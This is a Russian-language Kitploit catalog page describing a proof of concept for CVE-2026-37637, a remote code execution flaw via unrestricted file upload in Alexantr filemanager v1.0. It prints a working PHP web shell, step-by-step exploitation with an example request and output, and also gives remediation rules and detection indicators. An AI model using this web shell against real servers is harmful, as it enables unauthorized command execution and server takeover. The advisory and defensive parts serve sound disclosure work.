Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-37637 — Удалённое выполнение кода в Alexantr filemanager v1.0 через неограниченную загрузку файлов | Kitploit
Инструменты/GitHubGitHub/slo-cyber-sec/cve-2026-37637
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеРазработка Полезной Нагрузки
GitHubslo-cyber-sec/cve-2026-37637

CVE-2026-37637

Удалённое выполнение кода в Alexantr filemanager v1.0 через неограниченную загрузку файлов

Репозиторий
13 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-37637

Proof of Concept для CVE-2026-37637 — удалённое выполнение кода в Alexantr filemanager v1.0 через неограниченную загрузку файлов в filemanager.php.

Обзор

CVE-2026-37637 — это уязвимость удалённого выполнения кода, затрагивающая Alexantr filemanager v1.0.

Уязвимость существует в компоненте filemanager.php из-за недостаточной проверки загружаемых файлов. Удалённый злоумышленник может загрузить вредоносный PHP-файл в веб-доступный каталог и выполнить произвольные команды на сервере.

Статус CVE: отправлено в MITRE
Исследователь: CYBER-SEC Репозиторий разработчика: https://github.com/alexantr/filemanager


Сводка по уязвимости

ПунктОписание
CVE IDCVE-2026-37637
Тип уязвимостиУдалённое выполнение кода
Затронутый продуктAlexantr filemanager
Затронутая версияv1.0
Уязвимый компонентfilemanager.php
Вектор атакиУдалённый
Требуется аутентификацияЗависит от развёртывания/конфигурации
ВоздействиеВыполнение произвольных команд
Корневая причинаНеограниченная загрузка файлов и отсутствие серверной проверки файлов

Воздействие

Злоумышленник может загрузить вредоносный PHP-файл через функциональность загрузки файлов. Поскольку загруженные файлы хранятся в веб-доступном месте и выполнение PHP разрешено, злоумышленник может выполнять произвольные системные команды на сервере.

Успешная эксплуатация может позволить злоумышленнику:

  • Выполнять произвольные команды на сервере
  • Читать конфиденциальные файлы
  • Изменять или удалять файлы приложения
  • Загружать дополнительное вредоносное ПО или веб-шеллы
  • Продвинуться дальше в хостинговую среду
  • Полностью скомпрометировать затронутый сервер

Технические детали

Приложение позволяет пользователям загружать произвольные файлы без надлежащей проверки расширения файла, MIME-типа или содержимого файла.

Может быть загружен вредоносный PHP-файл, например следующий:

root@kitploit:~
<?php system($_GET['cmd']); ?>

После загрузки в веб-доступный каталог злоумышленник может выполнять команды, обращаясь к файлу через браузер и передавая команды через параметр cmd.

Пример:

root@kitploit:~
http://target/uploads/shell.php?cmd=id

Это приводит к выполнению команд в базовой операционной системе.


Шаги воспроизведения

1. Клонируйте уязвимое приложение

root@kitploit:~
git clone https://github.com/alexantr/filemanager
cd filemanager

2. Запустите сервер разработки PHP

root@kitploit:~
php -S localhost:8000

3. Откройте приложение

Откройте приложение в браузере:

root@kitploit:~
http://localhost:8000/filemanager.php

В зависимости от развёртывания или конфигурации приложение также может быть доступно через:

root@kitploit:~
http://localhost:8000/pheditor.php

4. Загрузите вредоносный PHP-файл

Создайте файл с именем shell.php:

root@kitploit:~
<?php system($_GET['cmd']); ?>

Загрузите файл с помощью функциональности загрузки приложения.

5. Выполните команду

После загрузки файла обратитесь к нему напрямую из браузера:

root@kitploit:~
http://localhost:8000/uploads/shell.php?cmd=id

Если эксплуатация успешна, сервер выполнит команду и вернёт вывод.

Пример вывода:

root@kitploit:~
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Proof of Concept

Вредоносная PHP-нагрузка

root@kitploit:~
<?php system($_GET['cmd']); ?>

Пример запроса

root@kitploit:~
GET /uploads/shell.php?cmd=id HTTP/1.1
Host: target
User-Agent: Mozilla/5.0
Connection: close

Ожидаемый результат

Команда, переданная через параметр cmd, выполняется на сервере.


Корневая причина

Уязвимость вызвана недостаточной серверной проверкой в функциональности загрузки файлов.

Приложение не ограничивает должным образом:

  • Расширения файлов
  • MIME-типы
  • Содержимое файлов
  • Место назначения загрузки
  • Права на выполнение внутри каталога загрузки

В результате исполняемые PHP-файлы могут быть загружены и выполнены напрямую.


Рекомендуемые меры по устранению

Разработчик и пользователи должны внедрить следующие меры защиты.

1. Блокировка опасных расширений файлов

Запретите загрузку исполняемых типов файлов, таких как:

root@kitploit:~
.php, .phtml, .php3, .php4, .php5, .phar

2. Используйте белый список

Разрешайте только ожидаемые типы файлов, например:

root@kitploit:~
.jpg, .png, .gif, .txt, .pdf

3. Проверяйте MIME-тип и содержимое файла

Не полагайтесь только на заголовок Content-Type, предоставленный клиентом.

Проверка файлов должна выполняться на стороне сервера.

4. Храните загруженные файлы вне корня веб-каталога

Загруженные файлы не должны быть напрямую исполняемыми или публично доступными.

5. Отключите выполнение PHP в каталогах загрузки

Для Apache это можно сделать с помощью .htaccess:

root@kitploit:~
php_flag engine off
RemoveHandler .php .phtml .php3 .php4 .php5 .phar
RemoveType .php .phtml .php3 .php4 .php5 .phar

Для Nginx запретите обработку PHP в путях загрузки:

root@kitploit:~
location /uploads/ {
    location ~ \.php$ {
        deny all;
    }
}

6. Переименовывайте загруженные файлы

Используйте случайные имена файлов, генерируемые сервером, и удаляйте расширения, контролируемые пользователем.

7. Применяйте надлежащий контроль доступа

Ограничьте функциональность загрузки только доверенными пользователями.


Обнаружение

Администраторы могут искать подозрительные загруженные PHP-файлы в веб-доступных каталогах.

Примеры индикаторов:

root@kitploit:~
shell.php
cmd.php
upload.php
backdoor.php
.php файлы внутри каталогов загрузки

Подозрительные шаблоны запросов могут включать:

root@kitploit:~
?cmd=
?exec=
?shell=
?command=

Пример записи в журнале:

root@kitploit:~
GET /uploads/shell.php?cmd=id HTTP/1.1

Отказ от ответственности

Этот репозиторий предоставлен исключительно в образовательных целях и для защиты систем.

Информация и proof of concept предназначены для помощи разработчикам, системным администраторам и специалистам по безопасности в понимании и устранении уязвимости.

Не используйте эту информацию для атак на системы без явного разрешения. Несанкционированный доступ к компьютерным системам является незаконным.

Автор не несёт ответственности за любое неправомерное использование информации, представленной в этом репозитории.


Ссылки

  • https://github.com/alexantr/filemanager
  • https://cve.mitre.org/
Скачать инструмент